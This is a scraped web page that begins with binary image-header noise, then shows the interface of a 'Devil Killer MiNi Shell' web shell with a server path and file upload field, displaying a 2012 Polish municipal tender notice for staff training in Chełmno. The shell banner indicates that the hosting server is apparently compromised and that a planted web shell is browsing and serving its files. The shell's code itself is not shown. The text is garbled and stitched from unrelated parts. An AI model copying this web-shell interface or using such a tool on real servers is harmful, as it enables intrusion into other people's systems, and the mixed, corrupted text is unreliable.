JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120217/48708-N-2012.html

<p class="kh_header"><b>Chełmno: Przeprowadzenie szkoleń stacjonarnych w ramach zadania 9 projektu  pt. Skuteczne, przejrzyste i efektywne urzędy administracji samorządowej</b><br>
<b>Numer ogłoszenia: 48708 - 2012; data zamieszczenia: 17.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Chełmno , ul. Dworcowa 1, 86-200 Chełmno, woj. kujawsko-pomorskie, tel. 56 6771729, faks 56 6771774.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chelmno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń stacjonarnych w ramach zadania 9 projektu  pt. Skuteczne, przejrzyste i efektywne urzędy administracji samorządowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkoleń stacjonarnych w 3 blokach szkoleniowych dla pracowników 4 JST  (Urząd Miasta Chełmna, Urząd Miejski w Świeciu, Urząd Gminy Unisław, Urząd Gminy Papowo Biskupie), którzy uczestniczą w projekcie pt. Skuteczne, przejrzyste i efektywne urzędy administracji samorządowej - współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego - Działania 5.2.1 Modernizacja zarządzania w administracji samorządowej Programu Operacyjnego Kapitał Ludzki.
Szczegółowy opis przedmiotu zamówienia:
Przedmiotem zamówienia jest realizacja usługi obejmującej swym zakresem przeprowadzenie szkoleń stacjonarnych dla pracowników z 4 JST (Urzędu Miasta Chełmna, Urzędu Miejskiego w Świeciu, Urzędu Gminy Unisław oraz Urzędu Gminy Papowo Biskupie) w ramach Zadania 9: Szkolenia specjalistyczne dla urzędników z 4 JST według potrzeb stanowisk pracy - zgodnie z poniższym opisem. Szkolenia są wdrażane w ramach projektu Skuteczne, przejrzyste i efektywne urzędy administracji samorządowej [współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego - Działania 5.2.1 Modernizacja zarządzania w administracji samorządowej - Programu Operacyjnego Kapitał Ludzki]. 
I. Informacje ogólne
1.1. Wszystkie szkolenia będą realizowane w udostępnionej bezpłatnie wykonawcy sali szkoleniowej zlokalizowanej w Urzędzie Miasta Chełmna, ul. Dworcowa 1, 86-200 Chełmno.
1.2. Zamawiający zapewnia w sali szkoleniowej ekran projekcyjny.
1.3. Za oznakowanie sali szkoleniowej zgodnie z aktualnymi Wytycznymi dotyczącymi oznaczania projektów w ramach PO KL jest odpowiedzialny Zamawiający.   
1.4. Szkolenia będą się odbywać zgodnie z Harmonogramem realizacji usługi szkoleniowej (Załącznik nr 2 do Umowy) oraz Harmonogramem dziennym szkolenia (Załącznik nr 3 do umowy).
II. Charakterystyka usługi szkoleniowej
Wykonawca będzie odpowiedzialny za przeprowadzenie szkoleń w ramach poniższych bloków szkoleniowych.
2.1. BLOK 1: FINANSE PUBLICZNE 
Szkolenie ma na celu aktualizację i podniesienie wiedzy pracowników w zakresie finansów publicznych. Szkolenie zostanie zorganizowane łącznie dla 20 osób [2 grupy po 10 osób;  4 dni x 7 h (1 godzina szkoleniowa = 45 minut zegarowych) = 28 h dla każdej grupy].			
Forma zajęć: wykład, dyskusja, studia przypadków, ćwiczenia indywidualne i grupowe.
Najważniejsze zagadnienia:
-Dzień pierwszy (7 h szkoleniowych)
1.Zakres i szczegółowość oraz zasady i tryb planowania, uchwalania i wykonywania budżetu gminy (miasta) - (3 h);  
2.Kontrola zarządcza (3 h);
3.Zasady, zakres podmiotowy i przedmiotowy odpowiedzialności za naruszenie dyscypliny finansów publicznych (1 h);
-Dzień drugi (7 h szkoleniowych)
4.Polityka rachunkowości (1 h);
5.Dochody budżetowe i ich ewidencja (4 h);
6.Majątek trwały i zasady jego ewidencji (2 h);
-Dzień trzeci (7 h szkoleniowych)
7.Wydatki budżetowe i ich ewidencja (6 h);
8.Wydatki strukturalne i zasady ich ewidencji (1 h);
-Dzień czwarty (7 h szkoleniowych)
9.Sprawozdawczość budżetowa (4 h);
10.Wynagrodzenia: naliczanie, odprowadzanie składek ZUS i podatków (2 h);
11.Zakładowy fundusz świadczeń socjalnych (1 h).
2.2. BLOK 2: ZAMÓWIENIA PUBLICZNE
Szkolenie ma na celu aktualizację i podniesienie wiedzy pracowników w zakresie zamówień publicznych. Szkolenie zostanie zorganizowane łącznie dla 24 osób [2 grupy po 12 osób;  4 dni x 7 h (1 godzina szkoleniowa = 45 minut zegarowych) = 28 h dla każdej grupy].		
Forma zajęć: wykład, dyskusja, studia przypadków, ćwiczenia indywidualne i grupowe.
Najważniejsze zagadnienia: 
-Dzień pierwszy (7 h szkoleniowych)
1.Kompetencje oraz zakres odpowiedzialności osób, które uczestniczą w procesie udzielania zamówień publicznych (2 h);
2.Najpopularniejsze tryby udzielania zamówień publicznych: przetarg nieograniczony oraz zamówienie z wolnej ręki (2 h);
3.Przygotowanie opisu przedmiotu zamówienia publicznego (2 h);
4.Metody określania wartości szacunkowej na dostawy, usługi, roboty budowlane (1 h).
-Dzień drugi (7 h szkoleniowych)
5.Specyfikacja Istotnych Warunków Zamówienia - kryteria oceny ofert (2 h); 
6.Od wszczęcia postępowania do wyboru wykonawcy zamówienia publicznego - praktyczne aspekty pracy członków komisji przetargowej (5 h);
-Dzień trzeci (7 h szkoleniowych)
7.Umowy o zamówienie publiczne (4 h);
8.Zamówienia publiczne do 14 000 euro: szacowanie wartości zamówienia (1 h);
9.Zamówienia publiczne do 14 000 euro przy zamówieniach dodatkowych lub uzupełniających (2 h);
-Dzień czwarty (7 h szkoleniowych)
10.Regulaminy (procedury) w urzędzie regulujące udzielanie zamówień publicznych do 14 000 euro (3 h);
11.Odpowiedzialność za naruszenia dyscypliny finansów publicznych przy zamówieniach do 14 000 euro (1 h);
12.Środki ochrony prawnej wykonawców (1 h);
13.Kontrola zamówień publicznych do 14 000 euro (1 h);
14.Nieprawidłowości przy udzielaniu zamówień do 14 000 euro (1 h).
2.3. BLOK 3: OBSŁUGA ORGANÓW JST
Szkolenie ma na celu aktualizację i podniesienie wiedzy pracowników w zakresie obsługi rady gminy (miasta). Szkolenie zostanie zorganizowane dla 8 osób [jedna ośmioosobowa grupa, 4 dni x 7 h (1 godzina szkoleniowa = 45 minut zegarowych) = 28 h].
Forma zajęć: wykład, dyskusja, studia przypadków, ćwiczenia indywidualne i grupowe.
Najważniejsze zagadnienia:
-Dzień pierwszy (7 h szkoleniowych)
1.Status prawny rady gminy (miasta), przewodniczącego rady, przewodniczących komisji rady, komisji rady i radnych (2 h);
2.Metodologia przygotowywania projektów uchwał rady gminy (miasta) - (5 h);
-Dzień drugi (7h szkoleniowych)
3.Skuteczna komunikacja interpersonalna i profesjonalna obsługa klienta zewnętrznego i wewnętrznego - techniki wspierające efektywną współpracę pracowników biura rady gminy (miasta) z przewodniczącym rady, przewodniczącymi komisji rady i radnych a także komórkami organizacyjnymi urzędu (4 h);
4.Efektywna organizacja czasu pracy - techniki wspierające terminowość załatwiania spraw (3 h);
-Dzień trzeci (7 h szkoleniowych)
5.Sporządzanie dokumentacji z obrad rady gminy (miasta) i posiedzeń komisji (5 h);
6.Obsługa wniosków, zapytań i interpelacji (1 h);
7.Prowadzenie rejestru uchwał rady gminy (miasta) - 1 h;
-Dzień czwarty (7h szkoleniowych)
8.Instrukcja kancelaryjna i rzeczowy wykaz akt (2 h);
9.Oświadczenia majątkowe (1 h);
10.Zasady dostępu do informacji publicznej (2 h);
11.Zasady i terminy przechowywania dokumentacji tworzonej i napływającej do rady gminy (miasta) i komisji rady (2 h). 
III.  Szczegółowe wymagania w stosunku do usługi szkoleniowej i cateringu:
3.1. Wymagania dotycząca materiałów merytorycznych dla uczestników:
a) Wykonawca zobowiązuje się do doręczenia Zamawiającemu w terminie do 5 dni roboczych przed przystąpieniem do realizacji szkolenia z zakresu każdego Bloku, materiałów dydaktycznych dla uczestników wszystkich grup szkoleniowych w formie elektronicznej 
b) Wykonawca zobowiązuje się do doręczenia Zamawiającemu, w terminie 5 dni roboczych po podpisaniu umowy, spisu co najmniej 1 pozycji książkowej odpowiadającej tematyce dla każdego Bloku szkolenia (w cenie rynkowej do 50,00 zł. każda pozycja).
c) Wykonawca jest zobowiązany zapewnić uczestnikom szkoleń następującą liczbę materiałów szkoleniowych: 1 zestaw materiałów szkoleniowych na każde 2 dni szkoleniowe dla jednego uczestnika tj. łącznie 104 zestawy, w tym: 40 zestawów dla bloku finanse publiczne, 48 zestawów dla bloku zamówienia publiczne i 16 zestawów dla bloku obsługa organów JST.
Łącznie w ramach wszystkich bloków szkoleniowych (1-3) wykonawca przygotuje, wydrukuje i przekaże 104 zestawy materiałów szkoleniowych (w tym prezentacje, przykłady, komentarze) uczestnikom szkoleń. Wykonawca jest także zobowiązany przekazać po 1 egzemplarzu materiałów szkoleniowych Zamawiającemu. Każdy zestaw materiałów szkoleniowych musi zawierać 30 stron treści merytorycznych będących przedmiotem prowadzonego szkolenia (prezentacje, przykłady, komentarze itp.) a także posiadać spis  treści,  stronę tytułową. Każdy zestaw ma zostać trwale złączony (zbindowany lub zszyty).
Materiały szkoleniowe Wykonawca jest zobowiązany dostarczyć do akceptacji w wersji elektronicznej Zamawiającemu nie później niż 3 dni robocze przed każdym blokiem szkoleniowym.
3.2  Wymagania dotycząca dokumentowania szkoleń:
a) Wykonawca zobowiązuje się do opracowania i wydruku zaświadczeń potwierdzających udział w szkoleniach w ilości odpowiadającej liczbie uczestników oraz przekazanie ich uczestnikom za potwierdzeniem odbioru po zakończeniu udziału w każdym bloku szkoleniowym. Wzór zaświadczenia Wykonawca jest zobowiązany dostarczyć do akceptacji w wersji elektronicznej Zamawiającemu 3 dni przed rozpoczęciem danego bloku szkoleniowego.
b) Wykonawca zobowiązuje się do prowadzenia i przekazania Zamawiającemu dokumentacji realizowanych szkoleń według wzorów przesłanych przez Zamawiającego drogą elektroniczną po podpisaniu umowy. Dokumentacja, o której mowa dotyczy w szczególności:
1) list obecności,
2) dzienników zajęć,
3) programów zajęć,
4) ankiet ewaluacyjnych,
5) kserokopii zaświadczeń ukończenia szkoleń,
6) list potwierdzających odbiór:
- materiałów szkoleniowych,
- skorzystania z cateringu,
- wydanych zaświadczeń ukończenia szkoleń.
c) Wykonawca zobowiązuje się do opracowania i dostarczenia Zamawiającemu szczegółowego programu szkoleń na każdy dzień szkoleniowy w oparciu o najważniejsze zagadnienia wskazane w punkcie II.  Programy szkoleń Wykonawca jest  zobowiązany  dostarczyć  do  akceptacji w wersji  elektronicznej  Zamawiającemu  nie  później  niż  3  dni  przed  rozpoczęciem szkoleń  dla każdej grupy. 
d) Wszystkie dostarczone dokumenty, formularze, materiały, etc. związane z realizacją niniejszego  zamówienia muszą być oznakowane przez Wykonawcę zgodnie z aktualnymi Wytycznymi dotyczącymi  oznaczania projektów w ramach PO KL dostępnymi na stronie internetowej Ministerstwa Administracji i Cyfryzacji:
http://ip2.mac.gov.pl/portal/ip2/538/1265/Promocja_EFS.html
3.3. Wymagania  dot. cateringu
Wykonawca jest zobowiązany do organizacji cateringu dla uczestników szkoleń i wykładowców w postaci 2 przerw kawowych i 1 przerwy obiadowej  - każdego dnia szkolenia - według poniższych wymagań:
a) serwis kawowy: 
Serwowany będzie w każdym dniu szkoleniowym dla uczestników szkolenia i wykładowców w sali szkoleniowej lub w innej sali znajdującej się w siedzibie Zamawiającego w formie stołu szwedzkiego z zapewnieniem warników do grzania wody lub termosów, filiżanek, szklanek, łyżeczek i serwetek w liczbie adekwatnej do liczby uczestników szkolenia. Zamawiający nie dopuszcza stosowania naczyń
i sztućców jednorazowego użytku. W zakres serwisu kawowego powinny wejść:
-ciastka (mieszanka deserowa - delicje, wafelki, ciastka kruche, itp.): 5 szt. różnych ciastek na osobę;
-kawa rozpuszczalna - 1 filiżanka - 250 ml na osobę,
-kawa mielona - 1 filiżanka - 250 ml na osobę,
-herbata - 1 filiżanka - 250 ml na osobę,
-1 butelka - 0,5 l wody mineralnej niegazowanej na osobę,
-1 butelka - 0,5 l wody mineralnej gazowanej na osobę,
-cukier - 4 łyżeczki lub 4 saszetki po 2 g na osobę,
-śmietanka do kawy - 50 ml na osobę,
-cytryna do herbaty - 1 plasterek na osobę.
b) przerwa obiadowa:
Obiad będzie serwowany każdego dnia szkolenia dla jego uczestników oraz wykładowców w sali szkoleniowej lub w innej sali znajdującej się w siedzibie Zamawiającego. Zamawiający dopuszcza stosowanie naczyń i sztućców jednorazowego użytku.
Menu obiadowe powinno być odrębnie przygotowane na każdy dzień szkoleniowy dla danej grupy i   powinno składać się przynajmniej z: 1 zupy, 1 ciepłego dania głównego (w postaci dania mięsnego lub rybnego, ziemniaków lub zamienników w postaci kaszy, ryżu lub frytek) oraz surówki lub gotowanych warzyw, a także soku do picia:
-zupa - 250 ml na osobę,
-porcja mięsa lub ryby - 150 g na osobę,
-porcja ziemniaków/kaszy/ryżu/frytek - 150 g na osobę,
-surówka/ gotowane warzywa - 150 g na osobę,
-sok - 250 ml na osobę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży odpowiednie oświadczenie o spełnianiu tego warunku. Wzór oświadczenia stanowi załącznik nr 3 do niniejszej SIWZ (OŚWIADCZENIE WYKONAWCY O SPEŁNIENIU WARUNKÓW UDZIAŁU OKREŚLONYCH ART. 22 UST. 1 pkt 1 - 4 USTAWY - PRAWO ZAMÓWIEŃ PUBLICZNYCH).
Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą spełnia- nie spełnia, w oparciu o informacje zawarte w dokumentach wyszczególnionych w rozdziale 10 niniejszej SIWZ.    Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił. 
Nie spełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca udowodni, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej trzy usługi szkoleniowe dla JST o tematyce związanej z przedmiotem zamówienia o łącznej wartości nie mniejszej niż 40 000 złotych brutto. W tym celu należy przedłożyć wypełniony załącznik nr 7 wraz z potwierdzeniem ze strony zamawiającego, że usługi te zostały przez wykonawcę wykonane należycie (np. protokół końcowy odbioru, referencje). Ponadto Wykonawca złoży odpowiednie oświadczenie o spełnianiu tego warunku. Wzór oświadczenia stanowi załącznik nr 3 do niniejszej SIWZ (OŚWIADCZENIE WYKONAWCY O SPEŁNIENIU WARUNKÓW UDZIAŁU OKREŚLONYCH ART. 22 UST. 1 pkt 1 - 4 USTAWY - PRAWO ZAMÓWIEŃ PUBLICZNYCH).
Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą spełnia- nie spełnia, w oparciu o informacje zawarte w dokumentach wyszczególnionych w rozdziale 10 niniejszej SIWZ.    Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił. 
Nie spełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia, tj.: 
1) co najmniej 1 wykładowcą dedykowanym do przeprowadzenia szkoleń w ramach Bloku 1 - Finanse publiczne, który przeprowadził w ciągu ostatnich dwóch lat przed terminem składania ofert szkolenia z zakresu rachunkowości budżetowej w wymiarze łącznym co najmniej 56 godzin szkoleniowych, posiada co najmniej 3 lata stażu pracy w jednostkach sektora finansów publicznych oraz wykształcenie wyższe z zakresu rachunkowości lub ukończone studia podyplomowe z zakresu rachunkowości;
2) co najmniej 1 wykładowcą dedykowanym do przeprowadzenia szkoleń w ramach Bloku 2 - Zamówienia publiczne, który przeprowadził w ciągu ostatnich dwóch lat przed terminem składania ofert szkolenia z zakresu prawa zamówień publicznych dla pracowników sektora finansów publicznych w wymiarze łącznym co najmniej 56 godzin, posiada wykształcenie wyższe prawnicze lub administracyjne oraz posiada co najmniej 3 lata stażu pracy na stanowisku pracy związanym z tematyką szkolenia;
3) co najmniej 1 wykładowcą dedykowanym do przeprowadzenia szkolenia w ramach Bloku 3 - obsługa organów JST, który posiada wykształcenie wyższe, co najmniej 3 letni staż pracy na stanowisku urzędniczym związanym z obsługą rady gminy (lub miasta) i/lub przeprowadził w ciągu ostatnich dwóch lat przed terminem składania ofert szkolenia z zakresu obsługi rady gminy lub miasta w wymiarze łącznym co najmniej 28 godzin. 
Wykonawca złoży odpowiednie oświadczenie o spełnianiu tego warunku. Wzór oświadczenia stanowi załącznik nr 3 do niniejszej SIWZ (OŚWIADCZENIE WYKONAWCY O SPEŁNIENIU WARUNKÓW UDZIAŁU OKREŚLONYCH ART. 22 UST. 1 pkt 1 - 4 USTAWY - PRAWO ZAMÓWIEŃ PUBLICZNYCH).
Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą spełnia- nie spełnia, w oparciu o informacje zawarte w dokumentach wyszczególnionych w rozdziale 10 niniejszej SIWZ.    Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił. 
Nie spełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie przedmiotowego zamówienia.
Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży odpowiednie oświadczenie o spełnianiu tego warunku. Wzór oświadczenia stanowi załącznik nr 3 do niniejszej SIWZ (OŚWIADCZENIE WYKONAWCY O SPEŁNIENIU WARUNKÓW UDZIAŁU OKREŚLONYCH ART. 22 UST. 1 pkt 1 - 4 USTAWY - PRAWO ZAMÓWIEŃ PUBLICZNYCH).
Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą spełnia- nie spełnia, w oparciu o informacje zawarte w dokumentach wyszczególnionych w rozdziale 10 niniejszej SIWZ.    Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił. 
Nie spełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
